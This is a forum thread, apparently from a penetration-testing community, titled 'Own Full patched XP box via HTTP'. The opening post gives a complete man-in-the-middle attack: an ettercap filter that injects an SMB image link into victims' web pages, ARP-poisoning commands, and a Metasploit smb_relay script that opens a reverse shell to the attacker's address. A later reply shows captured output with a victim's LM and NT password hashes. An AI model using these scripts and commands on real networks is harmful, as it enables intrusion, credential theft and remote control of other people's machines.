Page 1 of 5 123 ... LastLast
Results 1 to 10 of 122

Thread: Own Full patched XP box via HTTP

Hybrid View

  1. #1
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default Own Full patched XP box via HTTP

    update 7:27 PM 2/4/2009: http://www.tarasco.org/security/smbrelay/index.html




    videos:

    # with ettercap
    http://s5.video.blip.tv/170000300628...console219.flv

    # Thursday, 20 September 2007 ( not with ettercap )
    http://www.learnsecurityonline.com/v...ay-reverse.swf




    4:42 PM 4/25/2008:
    "" I tried it with "Use simple file sharing" (recommended) checked...and the exploit WOULD NOT WORK. ""

    sadly (sometimes !?!?!?) this is checked by default so I will look into some other things ...
    you also want to check out the fastrack mass client side has GDI and QT exploits all in one etc ! ( this is part of the fast-track.py you must update it to current )


    Firefox be design will not load a 'local share' this including \\SMB\image.jpg shares
    ( if anybody has a non javascript workaround please let me know FLASH also has the same security or just gets passed to firefox and then borks )

    May be possible to use this trick 301 redirect the user to a local\share
    http://forums.remote-exploit.org/showthread.php?p=94904



    What you need:
    * ettercap
    * ms framework3
    * victim must have admin privs with no blank password and load an HTTP or HTTPS webpage.
    * only works for MIM ( LAN etc .. )

    ** based on HD moore's presentation at Defcon that used WPAD http://video.google.co.uk/videoplay?...56903673801959 'Tactical Exploitation'

    change the IP to your IP


    smb.rc
    Code:
    use exploit/windows/smb/smb_relay
    set PAYLOAD windows/shell_reverse_tcp
    set LHOST 192.168.1.90
    set LPORT 21
    exploit

    smb.filter
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
              # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
       replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>" ");
       msg("Filter Ran.\n");
    }
    # etterfilter makes the smb.ef to use with ettercap

    etterfilter smb.filter -o smb.ef
    # run ettercap on target
    ettercap -T -q -F smb.ef -M ARP // // -P autoadd

    # start up msfconsole with the RC script
    /pentest/exploits/framework3/msfconsole -r smb.rc


    what happends ??

    ettercap replaces IMG with \\yourip so then the victim trys to access your SMB_RELAY server for the IMG
    then attacker say NO access denied ! victim says OK let me try my login by default


    ""Great job, but I got the well-known error message, which starts so:
    "FAILED! The remote host has only provided us with Guest privileges...."""

    read the error before that error the guest error just means the auth failed




    Quote Originally Posted by www
    5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.

  2. #2
    Junior Member unix_r00ter's Avatar
    Join Date
    Feb 2007
    Posts
    64

    Default

    does this only work on LAN??

  3. #3
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Very interesting ! I'm going to try it out right away.
    I'll be back and tell how it went


    Quote Originally Posted by unix_r00ter View Post
    does this only work on LAN??
    Read up on MITM (man in the middle) attacks.

  4. #4
    Just burned his ISO
    Join Date
    Apr 2008
    Posts
    2

    Default

    Quote Originally Posted by unix_r00ter View Post
    does this only work on LAN??
    it may be possible to inject the image with airpwn?

  5. #5
    Member imported_Deathray's Avatar
    Join Date
    Oct 2007
    Posts
    381

    Default

    Target: Windows XP SP0 no updates at all.
    Ettercap
    Code:
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Msfconsole
    Code:
    msf exploit(smb_relay) >
    [*] Received 192.168.1.78:1057 \ LMHASH:00 NTHASH: OS:Windows 2002 2600 LM:Windows 2002 5.1
    [*] Sending Access Denied to 192.168.1.78:1057 \
    [*] Received 192.168.1.78:1057 VICTIMLOSER\Victimlooser 
    LMHASH:93d1db444663b9c09378060fe4c2aead62db490241055c20 
    NTHASH:c3156deb18c7a6e6d800c39c451abcfe39baaa133d72058a OS:Windows 2002 2600 LM:Windows 2002 5.1
    [*] Authenticating to 192.168.1.78 as VICTIMLOSER\Victimlooser...
    [*] Failed to authenticate as VICTIMLOSER\Victimlooser...
    And by the way, I think you should lookup the rules about links in signatures.
    I'm not sure if plain-text links are allowed. Just trying to keep you out of trouble

  6. #6
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Couple of questions:
    Must file sharing be enabled on the victim as mentioned in the presentation?

    Is this for IE only? I'm seeing IE using <img src="\\ip\share\i.jpg> while Firefox is mozicon-url:file:////ip/share/i.jpg

  7. #7
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    humm ill try it with FF and add the code if it works thanks !

  8. #8
    Very good friend of the forum drgr33n's Avatar
    Join Date
    Jan 2010
    Location
    Dark side of the moon ...
    Posts
    699

    Default

    Nice little audit, I wrote a tut similar to this last October check it out.

    http://forum.remote-exploit.org/show...?t=9121&page=2

  9. #9
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Can you clarify how this will affect a corporate network? Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?

  10. #10
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    Quote Originally Posted by Dr_GrEeN View Post
    Nice little audit, I wrote a tut similar to this last October check it out.

    http://forum.remote-exploit.org/show...?t=9121&page=2
    Ya now days I would use a more current sploit say RTSP etc ..
    http://rmccurdy.com/scripts/videos/q...3%20msfweb.swf

Page 1 of 5 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •